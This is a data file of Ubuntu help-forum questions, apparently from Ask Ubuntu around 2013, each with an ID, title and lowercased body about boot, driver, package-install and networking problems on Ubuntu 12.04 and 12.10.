256727	updated 12.10 and now get flashing purple screen when booting	i 'm brand new to ubuntu ( and linux in general ) and have set up 12.10 to dual boot ( along with win7 ) . everything was going ok , but when i installed the updates and rebooted , i found that , after choosing to boot into ubuntu , i got a flashing purple screen with no login . i was able to reboot again and got into ubuntu by choosing the advanced option , with boot into safe mode . when i checked to see what was going on with the display in the settings menu , my monitor now comes up as a laptop monitor , whereas it was previously identified as a 19 '' dell monitor before the update . keeping in mind that i 'm brand new to ubuntu and the world of linux , what is likely to be the problem and what can i do about it ? update ( 21:15 gmt , 2/16/13 ) i 've gone ahead and reinstalled 12.04 , but the problems persist . i can get everything working ok if i open ubuntu using recovery mode , otherwise i get the flashing purple screen . i have , however , gotten the monitor to be detected as a dell 19 '' rather than a laptop screen . any other ideas ?
256731	ubuntu 12.04 lts wont recognize windows 7 for a dual boot	im trying to dual boot win 7 and ubuntu 12.04 on my laptop ( asus u47 ) , ive tried creating unallocated space in win 7 and creating a partition in ubuntu but it wants to unmount a previous partition ( im assuming its talking about the c : drive in win 7 ) , not sure if i should unmount it or not but i do not have a recovery disk for win 7 ( and i do need win 7 ) so i do not want to risk losing it . right now ive increased the size of c : drive so there is no unallocated space anymore . and as a side note i have tried this with ubuntu 12.10 , still no recognition of win 7 . my hard drive setup in the disk mng in win 7 is just c : drive and system reserved . oh and fyi my tech level is average so im not that great at this stuff . and sorry if this has been asked before , but i never saw anything . thanks ! !
256732	vmware wants /dev/dsp , but it does not exist	running an ms-dos virtual machine within vmware workstation 9.01 requires the `` virtual sound card '' to be set to sb16 . however , when it is configured as sb16 , it wants /dev/dsp . this device does not exist . all sound works fine in ubuntu , and other virtual machines in workstation 9 have fully functional sound . ubuntu 12.04 , kernel is 3.2.0-37 , platform is x64-smp , oss-compat is already installed . launching vmware with padsp did not work either . when launching the virtual machine , it still reports that /dev/dsp can not be found . already tried setting the virtual sound card to auto detect and alsa-compatible sound card ( these are the only two choices ) . result is the same . from what i have been able to find so far , no one else is reporting this particular problem . suggestions for missing /dev/dsp have always involved pointing to a different device or installing oss-compat and/or alsa-oss . neither of these fixes the problem .
256734	ubuntu 12.10 overheats and fan runs high	i have the problem with my fan constantly and hot cpu . i have a dell inspirion 15r special edition . i followed the instructions to load jupiter to solve this but when i enter : sudo add-apt-repository ppa : webup8team/jupiter i get the following error : can not access ppa ( https : //launchpad.net/api/1.0/~webup8team/+archive/jupiter ) to get ppa information , please check your internet connection and internet is working my specs are : inspiron 15 r special edition , btx,7520 intel core 3rd generation processor , i7-3612qm , 4core 32g solid state drive , isrt , a5 pwa , daughterboard , sata,7520 hard drive,1 terabyte,5.4 krpm 8 gb dual channel ddr3 sdram intel ( r ) hd graphics 4000 amd radeon hd 7730m 15.6 full hd 1080 pixel led display ubuntu 12.10 is loaded as a dual boot alone on the 32 gb solid state drive .
256737	installing trimaran	i 'm having the same issue as posted here , but in my case , using ubuntu 12.04 lts live usb , inside ~/trimaran/openimpact folder , try to execute ./install_openimpact shell replies me at the end : processing platform/x86lin_gcc/ipa_lib/__impact_lib.c gcc -w -e -m32 -dimpact_fix -i/home/ubuntu/trimaran/openimpact/platform/x86lin_gcc/include -i/home/ubuntu/trimaran/openimpact/include -i/home/ubuntu/trimaran/openimpact/config/x86lin_c platform/x86lin_gcc/ipa_lib/__impact_lib.c > platform/x86lin_gcc/ipa_lib/__impact_lib.i impact-edgcpfe -- pcode -m -w platform/x86lin_gcc/ipa_lib/__impact_lib.i '' platform/x86lin_gcc/ipa_lib/__impact_lib.c '' , line 1943 : error : declaration is incompatible with `` int getnameinfo ( const struct sockaddr *__restrict__ , socklen_t , char *__restrict__ , socklen_t , char *__restrict__ , socklen_t , int ) '' ( declared at line 679 of `` /usr/include/netdb.h '' ) int getnameinfo ( const struct sockaddr *sa , socklen_t salen , char *host , ^ 1 error detected in the compilation of `` platform/x86lin_gcc/ipa_lib/__impact_lib.i '' . exiting : non-zero exit code make [ 1 ] : *** [ platform/x86lin_gcc/ipa_lib/__impact_lib.pst ] error 1 make [ 1 ] : leaving directory `/home/ubuntu/trimaran/openimpact' make : *** [ all ] error 2 any ideas ?
256739	ubuntu 12.10 wo n't boot from usb - isolinux.bin missing or corrupt	this was an official 64-bit download from the ubuntu site , so it 's kind of sad to see even that 's not working . i made a bootable ubuntu 12.10 usb stick with usb image writer ( mintstick ) on linux mint 14 cinnamon and then shut down after ejecting the drive . when i put the drive back in and boot from it , a message shows briefly : 'isolinux.bin missing or corrupt , ' before going black and booting to mint . i have tried unetbootin instead of mint 's usb image writer but the usb drive does not show . unetbootin has not worked for me in the past anyway whenever creating live usbs . usb is formatted to msdos . did not tamper w/ partitions , etc . in gparted , disks , etc . i have seen this issue asked once before on this website and other times across the web , but no one gives a good answer other than it 's probably a bad download . if so , it 's pretty disappointing because this is the official ubuntu.com download link . any ideas ? are there any other alternate download mirrors besides the official one ( that do n't take hours to download ) ?
256745	using sudo apt-get with files from gz	hubert @ hubert-pu129av-aba-a1010y : ~/downloads/solitaire/bigsol1.4 $ ls bigsol bitmaps data license.html hubert @ hubert-pu129av-aba-a1010y : ~/downloads/solitaire/bigsol1.4 $ sudo apt-get install bigsol reading package lists ... done building dependency tree reading state information ... done e : unable to locate package bigsol tried this several ways . using ubuntu 12.04
256747	when will ubuntu 13.04 get libreoffice ?	i installed ubuntu 13.04 ( raring ringtail ) and it 's blazing fast â i love it . i was hoping , however , that 13.04 would come with libreoffice 4.0 but it only has 3.6 . are there plans to bring 4.0 to ubuntu 13.04 ?
256748	removing ubuntu-desktop through software center	so , i try to delete some applications that i really do n't need ( or that i 've read reviews and there are better alternatives ) . but then i got on some applications that tell me `` if you uninstall `` x application '' , future updates will not include new items in the ubuntu desktop systme set '' what does that mean ? it 's still safe to delete it ? i 'm running ubuntu 12.10 64-bit . is there anyway to remove the stuff i do n't need without messing everything else up ?
256759	deploy multiple wordpress sites with juju	this may seem like an obvious question , but can you deploy multiple ( distinct ) wordpress sites with their own databases etc ? but using a single deployment ? so not dedicated vm 's for each sites services . and would the optimized tuning work in this scenario ? ie . we are currently using cpanel/centos to host multiple sites ( standalone html sites and php/mysql wordpress sites ) which uses virtual hosts . so does the juju wordpress charm take into account setting up virtual hosts ? or in the case of nginx `` server blocks '' ? also using the wordpress charm can modify it to deploy standalone html sites ( that do n't require databases ) along side it ?
256760	can i install cadence on ubuntu 12.04 lts x86 machine ?	i need a cadence like application to switch between jack and pulse audio . can i install cadence on ubuntu 12.04 lts ( not ubuntu studio or dream studio ) . is it going to work ? i already installed : qjackctl , pulsejack module etc . http : //kxstudio.sourceforge.net/kxstudio : applications : cadence
256762	i ca n't hear sounds with ubuntu but can with windows	i ca n't hear any sounds whether i try to listen to music , movies , or youtube . my headphones are okay with windows so please help me troubleshoot my ubuntu set-up .
256764	failed to load the package list	first of all say apology to ask duplicate question . i 'm using first time ubuntu 12.10 os.when i 'm update the update manager it is giving error like this ... . failed to load the package list : this is a serious problem . try again later . if this problem appears again , please report an error to the developers . e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . i 'm search solution for this error some body say type following commands ... sudo rm /var/lib/apt/lists/* -vf sudo apt-get update but again it is showing following error.. e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . at top right corner of my system show red ( - ) symbol when we click the symbol it is showing.. an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) please help me any body how to solve this one ... update : this is my sources.list # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //in.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //in.archive.ubuntu.com/ubuntu/ quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //in.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //in.archive.ubuntu.com/ubuntu/ quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //in.archive.ubuntu.com/ubuntu/ quantal universe deb-src http : //in.archive.ubuntu.com/ubuntu/ quantal universe deb http : //in.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http : //in.archive.ubuntu.com/ubuntu/ quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //in.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //in.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //in.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu quantal main deb http : //archive.canonical.com/ lucid partner deb-src http : //archive.canonical.com/ lucid partner deb http : //archive.canonical.com/lucid partner deb-src http : //archive.canonical.com/lucid partner deb http : //archive.ubuntu.com/ubuntu hardy main multiverse deb-src http : //archive.ubuntu.com/ubuntu hardy main multiverse deb http : //archive.ubuntu.com/ubuntu hardy-updates main multiverse deb-src http : //archive.ubuntu.com/ubuntu hardy-updates main multiverse deb http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main # deb-src http : //extras.ubuntu.com/ubuntu quantal main deb httphttp : //archive.ubuntu.com/ubuntu hardy-updates main multiverse deb-src httphttp : //archive.ubuntu.com/ubuntu hardy-updates main multiverse
256768	wireless not working/ wireless enabling dysfunction	i am currently running ubuntu 12.1 , though i am continuously running into the same networking error . whenever i boot ubuntu , it takes me to the desktop perfectly , but when the wireless connection says its connected , it does not allow me to surf firefox due to a lack of connection though the icon on the top right says it is connected . also , when rebooting , the wireless icon will at times have trouble enabling to turn on , even when it says its already enabled , hence continuing the problem in more depth with the connection error . how can i fix my wireless connection to work properly ?
256769	brightness and actual backlight mismatch after reboot	this is not a duplicate of this or that ! the problem in detail the brightness hotkeys works well in increasing or decreasing the brightness , but if the brightness is less than 100 % , after a reboot the brightness level and actual backlight will mismatch ; where i mean the actual backlight is not at its maximum while the brightness level shows 100 % . to avoid such problem i should set the brightness level at 100 % every time before shutdown . efforts iâve tried all suggested answers for brightness problems , including acpi_backlight in grub and echo values in rc.local , but no change . recently i found that pressing brightness hotkeys while brightness settings window is open sometimes make the brightness slider disappear ! iâve had this problem after 11.04 , i mean in either 11.10 , 12.04 and 12.10 , and saw in various netbooks and laptops . i guessed it should be related to unknown graphics driver ; because i had a known driver in 11.04 and no problem , but an unknown one in all computers with this problem : so i just tried 13.04 via usb and faced the same problem although the graphics was known : a possible cause in the folder /sys/class/backlight there are two links ( to folders ) : acpi_video0 which contains brightness files with the maximum 15 ; intel_backlight which contains brightness files with the maximum 125 . i wonder that in this folder brightness is 125 ( at maximum ) but actual_brightness is 70 , even if the backlight is at its actual maximum . does anyone know about this or any possible solution ?
256771	why ca n't i install steam onto ubuntu 12.10 32-bit or 64-bit version ?	at first i had installed a 32-bit version of ubuntu 12.10 alongside windows 7 premium . when i tried installing steam onto ubuntu from the steam client , i got an error message stating wrong architecture 'i386 ' . then i tried installing steam through ubuntu software center , and i got one message saying that `` package dependencies can not be resolved : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . '' i also had another message stating , `` the application ubuntu software center has experienced and internal error . there was an error submitting the transaction '' since the software center said `` steam ( 64-bit ) '' , i figured that i should have installed the 64-bit version instead of the 32-bit version . so , i uninstalled my previous ubuntu and installed the 64-bit version , which if i 'm correct is amd64 and not i386 . i tried installing steam through the website and software center again and still the same messages appear . i would appreciate some help on the choice between 32-bit and 64-bit versions of 12.10 ( if i 'm not mistaken , 12.10 is the newest version of ubuntu ) , or anything else i can do to fix this . i hope to get this resolved , as this is my first experience with ubuntu and i 'm really liking this os ( aside from the problem i 'm dealing with now . )
256775	grub2 : always fails to boot have to do a manual configfile on each boot	http : //paste.ubuntu.com/1690610/ after doing a fresh install of ubuntu 12.10 from a usb thumb drive , ( using unetbootin to copy the iso to the thumb drive ... if that matters . ) i installed ubuntu onto my system . i have these devices available to me . p1 : asus dvd/blue ray rw p2 : corsair 240gb ssd ( windows ) p3 : corsair 240gb ssd ( ubuntu ) p4 : western digital 750 gb hdd ( data drive ) p5 : western digital 80 gb hdd ( data drive ) i installed ubuntu onto p3 , resulting in the system showing up on the /dev/sdc drive . i removed all of the old partitions on that drive , did a quick format of the file system using the installer , and left the drive empty . i then clicked on the drive , and hit next . the installer from the live usb drive complained that i did not have a swap volume , but i ignored that warning . about 5 minutes later , the install was done . restarted the system , only to have the grub rescue menu pop up . i followed the guide found here ... https : //help.ubuntu.com/community/grub2/troubleshooting ... and managed to get the system to boot . thinking that was going to be the end of it , i installed all of the software i used and did the updates as normal . after it asked me to restart , i did and this time i got a grub prompt . following the guide above again , i used the configfile command and pointed it to the grub.cfg file and everything booted just fine again . not wanting this problem to happen every time i wanted to boot , i followed the section post-boot follow up and got the following errors ... dygear @ dygear-ubuntu : ~ $ sudo update-grub [ sudo ] password for dygear : generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-23-generic found initrd image : /boot/initrd.img-3.5.0-23-generic found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sdd1 /usr/sbin/grub-probe : warning : could n't find physical volume ` ( null ) ' . some modules may be missing from core image.. /usr/sbin/grub-probe : warning : could n't find physical volume ` ( null ) ' . some modules may be missing from core image.. /usr/sbin/grub-probe : warning : could n't find physical volume ` ( null ) ' . some modules may be missing from core image.. /usr/sbin/grub-probe : warning : could n't find physical volume ` ( null ) ' . some modules may be missing from core image.. /usr/sbin/grub-probe : warning : could n't find physical volume ` ( null ) ' . some modules may be missing from core image.. /usr/sbin/grub-probe : warning : could n't find physical volume ` ( null ) ' . some modules may be missing from core image.. done this is the drive with my linux install on it . dygear @ dygear-ubuntu : ~ $ sudo fdisk -l /dev/sdc disk /dev/sdc : 240.1 gb , 240057409536 bytes 255 heads , 63 sectors/track , 29185 cylinders , total 468862128 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x75a8b2f8 device boot start end blocks id system /dev/sdc1 2048 468860927 234429440 83 linux i 've had little luck beyound this point , and i have no idea how to repair this problem when the tools provided do n't seem to work . it should be noted that i have an asus uefi capable motherboard . most of the commands that i was using in the grub recovery console pointed to an i386-pc path , where it should of been an x86_64-efi path . that might be part of the problem , i 'm not sure . dygear @ dygear-ubuntu : ~ $ ls /boot/grub fonts grub.cfg grub.efi grubenv locale x86_64-efi any ideas on how to fix this , or should i report this as a bug ?
256776	getting files from an external partition	so i had an external partition on windows where i used to save ( not important stuff ) stuff . whatever i 've been looking around but there 's no tool that let 's you check the partition . is there any tool that lets you look the stuff inside a partition ?
256781	are the advantages of having /home on a separate partition actually advantages ?	with reference to answers given here , it is mentioned multiple times that the main advantage is the ability to change/reinstall ubuntu versions without losing configuration files . however , will a new install not require all you applications to be reinstalled ? living in countries where internet connections are slow , wo n't reinstalling the applications , updating os , installing drivers just negate this advantage ? you might spend less time switching between ubuntu versions ' but you will spend as much time or more , making them usable each time .
256782	how to copy paste contents in vi editor ?	i tried using ctrl + v for pasting contents in a vi editor document , but ctrl + v is not interpreted as a paste .
256788	can not install handbrake in 64-bit ubuntu 12.10	when i go into synaptic and try to install the handbrake-gtk , after it gives me the list of all the other packages it has to install , i get this message : the following packages have unresolved dependencies . make sure that all required repositories are added and enabled in the 'repositories' option under 'settings' handbrake-gtk : i386 : depends : libwebkitgtk-1.0-0 but it is not going to be installed i tried installing in the terminal but that would n't work either , i think for the same reason . now using the pages http : //www.ubuntuupdates.org/ppa/webkit_team ? dist=precise and http : //www.ubuntuupdates.org/package/webkit_team/precise/main/base/libwebkitgtk-1.0-0 and the terminal i supposedly added and install the libwebkitgtk-1.0.0 package , but whenever i go back into synaptic and try to install handbrake i still get the same error message . thanks in advance .
256790	uninstall ubuntu without access to uninstall file	i tried to use the windows add remove program to uninstall ubuntu , but it says i dont have access to the uninstall-wubi . which is apparantly on my h drive which windows doesnt even know exists . is it possible to download an uninstall-wubi and use it
256792	how do i enable hardware virtualization technology ( vt-x ) for use in virtualbox ?	so i am trying to run ubuntu in a virtualbox but on installing 12.10 from the .iso i was greeted by a warning telling me that audio would n't work then i pressed next and this popped up : failed to open a session for the virtual machine tux 3 vt-x features locked or unavailable in msr ( verr_vmx_msr_locked_or_disabled ) details result code : e_fail ( 0x80004005 ) component : console interface : iconsole { db7ab4ca-2a3f-4183-9243-c1208da92392 } and then it does n't work . i assigned 4gb of my 8gb to ubuntu , 100 dynamically allocated gb of space , and 12mb of graphics memory . i 'm running an asus p8z77 v lx mobo with an intel i5 3550 processor . downloaded 12.04.2 on my pc and tried again . still getting the same message .
256794	why does n't chmod work on a file under /media ?	i want to execute a script file from terminal but it shows error root @ silambarasan-pc : /media/d-developme/androidsdk/adt-bundle-linux-x86/sdk/tools # ./android -bash : ./android : permission denied` so i saw the file permissions from terminal & tried to give execute permission . but no use even i give permission it wo n't change . root @ silambarasan-pc : /media/d-developme/androidsdk/adt-bundle-linux-x86/sdk/tools # ll android -rw-r -- r -- 1 silambarasan silambarasan 3498 dec 6 08:14 android root @ silambarasan-pc : /media/d-developme/androidsdk/adt-bundle-linux-x86/sdk/tools # chmod 777 android root @ silambarasan-pc : /media/d-developme/androidsdk/adt-bundle-linux-x86/sdk/tools # ll android -rw-r -- r -- 1 silambarasan silambarasan 3498 dec 6 08:14 android` i do n't know what to do . thank you .
256797	install ubuntu 12.10 on windows using windows installer	i 'm presently using windows xp . when trying to follow instructions for an installation with a dvd , my system shows the following error : how can i install ubuntu if i have this problem ?
256801	help making a bootable usb from my mac	i have tried many times to make a bootable usb drive to run ubuntu from my macbook air and have failed many times , the instructions that are given are somewhat confusing mostly because i am most definitely not a professional . can you give me some detailed instructions ? preferably a how-to video , that would make it a lot more clear .
256805	how do i pick where the software center will install a package , specifically steam ?	i want to install steam and other programs to a different partition , how do i pick where ubuntu software center will install them ? how do i pick where steam games will be installed ?
256806	why does ubuntu software center need a separate login ?	so there is this ubuntu one feature which promises to be the one central place / account where i keep stuff and so on . so why , if that is the case , do i need to register again for the ubuntu software center ? i honestly ca n't understand it is necessary to have two separate accounts for two features of the same operating system . or can i use my ubuntu one account to login to software center somehow ? please explain , thanks for the help .
256807	ffmpeg wait before recording desktop	is it possible to make ffmpeg wait a couple seconds before starting to record ? if so how is there another way to start an ffmpeg script besides from the terminal ?
256809	increase /tmp folder space using external drive	using ubuntu 12.04 precise pangolin , 32 bit on 6gb partition i do n't have much space left on my hdd , so i installed ubuntu on a partition of just 6gb . everything was working fine . i decided to have a custom ubuntu of my own , so i downloaded ubuntu customization kit and installed it . on using uck , i found out that it needs the /tmp folder to have at least 5 gb space , mine has just 200 mb . i have a few external usb storage drives . can i use them to increase my /tmp folder space ? please excuse me if my question is a stupid one . this is my first tryst with ubuntu : )
256810	touchapd undetected fresh 12.04 install on dell vostro 1710	decided to install 12.04lts on my vostro 1710 , but the touchpad is not recognized at all . i found some similar bug reports but the solutions given did not help me out . here is my xinput list : pipo @ pipo : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ 2.4g wireless mouse id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ integrated webcam id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=12 [ slave keyboard ( 3 ) ] no touchpad is listed , the 2.4g wireless mouse is the usb mouse i am using now ... the touchpad does works . been some time ago that i posted this , hope someone can help out .
256813	where to find synaptics mouspad gesture installation packages	i stumbled upon following web page and was immediately interested in the mousepad gesture possibilities . however i ca n't find any installation package ( not in the software center , nor in synaptic ) . anyone an idea where the installation packages can be downloaded ?
256818	how can i change the default download action to gnome-open in firefox ?	firefox determines which program to use to open a download based on the download 's mime type . more information on that can be found in mozilla 's online documentation . it seems to me that when firefox encounters a mime type it has no configuration for , it prompts the user to open it in gedit . why gedit ? how can i change the default for unrecognised mime types to gnome-open ?
256819	can not set up lan internet connection	i just installed both current versions 12.04 and 12.10 of ubuntu ( not simultaneously ) and i could not set up an internet connection . the ethernet port on my computer doens't light up when i 'm in ubuntu as it does when i 'm on windows . furthermore , there is no autoeth0 option , and when i try to do things manually , it prevents me from being able to save the set up . and for the life of me i ca n't find the console where one types the ifconfig command which displays all the info about networking . the fact that the ethernet port on my pc does n't light up leads me to believe that the os or mobo does n't recognise the port as an ethernet port and maybe i need drivers or the drivers are n't being recognised . can anyone help ? i really want to use this os because it 's the staple for computational chemistry and steam has just made its way there , so i figured i might as well start using it as i 'm nearing the end of my undergrad and there are now games to be played there . in case this helps my setup is the following . gigabyte z77x-ud3h mobo , i7 3770k oc 'd @ 4.7 ghz , gigabyte 7970 ghz oc 'd to 1.1 ghz
256821	why ca n't i install steam in ubuntu win7 ntfs partition ?	i have win7 and ubuntu partition in my laptotp . i downloaded steam .deb package . i tried to install it by doubleclicking it , but it said : internal error the file â/home/djokosihono/desktop/steam_latest.debâ could not be opened . and when i try to install it using terminal , it said : dpkg : error processing steam_latest.deb ( -- install ) : package architecture ( i386 ) does not match system ( amd64 ) errors were encountered while processing : steam_latest.deb it also happened when i try to install google chrome . is there any solutions for this ? thanks in advance .
256829	the unicode fonts layout provided by ubuntu vs. the official font layout	while choosing nepali language . i see there are slight differences between the layout provided by ubuntu 's keyboard layout vs. the standard font layout provided for nepali language . i am also not able to install the provided font . is there a way to correct this ? i get the font from http : //mpp.org.np/index.php ? option=com_docman & task=doc_details & gid=8 & itemid=63 and the layout is and the ubuntu 's layout is : there are no symbols - ! @ # $ % ^ & * ( ) .
256832	preinstalled windows 8 uefi is not able to get ubuntu dual boot	i just bought a new toshiba satellite m840 with preloaded windows 8 . i checked that windows is installed in uefi mode . i did a lot of research online on how to get ubuntu 12.10 installed for dual boot . first , i xhanged the bios settings from quick boot to normal and disabled secure boot . i installed easeus partition master 9.2.1 and created a 64gb partition ( ntfs ) , i called this partition f drive . i also downloaded ubuntu 12.10 64-bit dvd iso . in windows 8 desktop mode , i launched ubuntu studio 12.10 and installed ubuntu on this f drive . the installation went all the way to the end without a problem . when the ubuntu installation was done , i rebooted . after reboot , the problem appears . i can see a light blue display , showing windows 8 and ubuntu . when i selected ubuntu , it popped up with another screen showing : windows fails to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language setting , and then click next 3 . click repair your computer . if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : the application or operating system could n't be loaded because a required file is missing or contains errors . when i power off/on again , if i select windows 8 ( light blue screen , os selection ) the system will still boot up windows 8 without a problem . the problem is that i am not able to boot into ubuntu .
256837	libreoffice 4.0 's menu bar is not integrated with unity	one of the most interesting features of the new libreoffice 4 is the direct compatibility with unity 's menu bar and hud . so i 've just installed this wonderful new release . everything works fine ... excepting that . so , as an active user of every existing hud at ubuntu , i would like to know how to enable it , as i have n't found any info in libreoffice 's wiki , in ask ubuntu or in the web in general . and please ... do not post lo-menubar because it just wo n't work . as usual ... thanks in advance ! : )
256838	ctrl + alt + f1 show nothing	first of all sorry for my bad english . i have installed today ubuntu 12.04 on my desktop . i have a nvidia 8400gs which is giving me a lot of problems . ubuntu does not take the drivers automatically and then forces me to work in 800 x 600 . i tried to install the additional drivers but it did not do anything , it gave me an error after installation and i had to reinstall the system . now i 'm trying to install the drivers manually , but when i go to console mode , turning off the graphics via ctrl + alt + f1 , the screen remains black and whatever i type , nothing happens . how can i fix ?
256840	what to do to install ubuntu with a bootable usb stick ?	okay , so i 've made a bootable usb stick using theese instructions : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-windows now i have no idea what to do next to install it . please help
256845	shortcut to boot on ubuntu from windows	i have a dual-boot windows/ubuntu , my default os is windows : ( . so , when windows is started and i need to go to ubuntu , i need to choose him on grub , of course . i would like to make a windows shortcut to reboot on grub and start on ubuntu . there is a way to do this ?
256846	predefined cell id assignment for an ad-hoc wlan	i have a debian/ubuntu embedded boards that i connect them via an ad-hoc network with the following settings board : ~ # cat /etc/network/interfaces auto wlan0 iface wlan0 inet static address 10.0.0.2 netmask 255.255.255.0 wpa-driver nl80211 wpa-conf /etc/wpa_supplicant.conf board : ~ # cat /etc/wpa_supplicant.conf # ibss/ad-hoc network with wpa-none/tkip . ctrl_interface=/var/run/wpa_supplicant ap_scan=1 network= { ssid= '' adhoc_test '' mode=1 frequency=2412 proto=wpa key_mgmt=wpa-none pairwise=none group=tkip psk= '' abcdefgh '' bssid=f8 : d1:11:52:0c:4e } these configurations creates an ad-hoc wlan , however , the nodes often gets different cell id so that they can not communicate with each other . to prevent it i added bssid=f8 : d1:11:52:0c:4e line , however , no node get this predefined cell id when they get the cell id . my question is that how can i prevent nodes to get different cell ids ? why bssid line does not work in the ad-hoc mode ? p.s . i tried these settings on ubuntu and debian dist . that have 3.2 and 3.4 kernels . wpa_supplicant versions that i used were 0.7 , 1.0 , and 2.0 all did not work . for the chipset , i am using atheros ar9271 chipset for the wifi module .
256847	hibernate altrnative tools in ubuntu 12.04	due to the persistent problem with garbling fonts after resuming hibernation in ubuntu ( which remained unanswered in this thread original question ) ; i would like to ask if there are other tool/ gnu packages which actually do the hibernate process in an alternative options for the ubuntu 12.04 official hibernate ?
256851	multiple shortcuts with xbindkeys or other ways in chromium	i have a problem . i will create a multiple shortcut for my notebook keyboard if chromium is open . in a browsergame i can use strg+1 and similar for a buff . now i will create that circumflex-key or a special key on my laptop do this : rress on circumflex ( or other key ) do starting the gamefunktions on strg+1 strg+3 strg+4 similar in chromium . i have no idea of ââprogramming in programs or other phyton . i hope you understand what i mean how i can fix this ? thx //o.f .
256852	how can set disk io priority automatically ?	if i use some io intensive application ( like virtualbox , steam data verification or even dd ) my system becomes almost unresponsive . despite all being started with normal priority , they make the desktop very sluggish and delay a lot the startup of other applications . i know i can use something like ionice to change the priority to idle for instance , but in the case of virtualbox which spawns many processes it becomes difficult . can i give some type of hints to the system , so when launching some specific applications they are started with the least io priority ?
256854	where is sublime text 2 installed	i was trying to make sublime text 2 start from the terminal . i found a great resource but i can not find where it is installed . i used the webupd8 ppa , anyone know where the ppa installs sublime .
256858	can not access to internet on virtual xp	i ' m using virtualbox on ubuntu 12.04 to run virtual xp . i can not access to internet . i have read the how to let a virtualbox guest ( running windows ) access the internet ? , but it seems does not work . i really appreciate your help ! : ) thanks ! here is my settings .
256866	mmc0 : error -110 whilst initialising sd card	i have a problem trying to mount a sd card in ubuntu 12.04 . the message what i get from the system is : mmc0 : error -110 whilst initialising sd card i 'm on the 3.5.0-24-generic kernel . i check previous kernel 3.5.0-15 and card is on the system . i think is some bug in kernel . i was looking some solution on web . they say my card is dead ( but is working ) what i should do ? some more information on this issue here . if someone have more question about my hardware just ask .
256867	dhcp 'hotplugging ' or failover	when some pcs are connected via a simple switch , that is also connected to an dhcp router , is it possible to have them autoconfiguring their ip adresses , if the dhcp is absent , but dhcp-configured , as soon it is available ? is this possible with network-manager ? i think it would be as simple as have the pcs keep their adresses if the dhcp becomes unavailable , but they have to keep them forever even if rebooted , until dhcp became available again . or maybe avahi/zeroconf can assign adresses if and only if dhcp is unavailable ?
256872	how do i allow access to userdir on 12.10 ?	i 've just installed a fairly vanilla lamp stack on 12.10 ( via apt-get install mysql-server phpmyadmin ) on my laptop for development purposes . i 've enabled mod_userdir and restarted apache , but trying to access a url under http : //localhost/~username/ just gives me 403 forbidden . accessing http : //localhost works fine . i 've installed similar setups lots of times on previous ubuntu versions , but never come across this problem . do i need to do something special to allow access ?
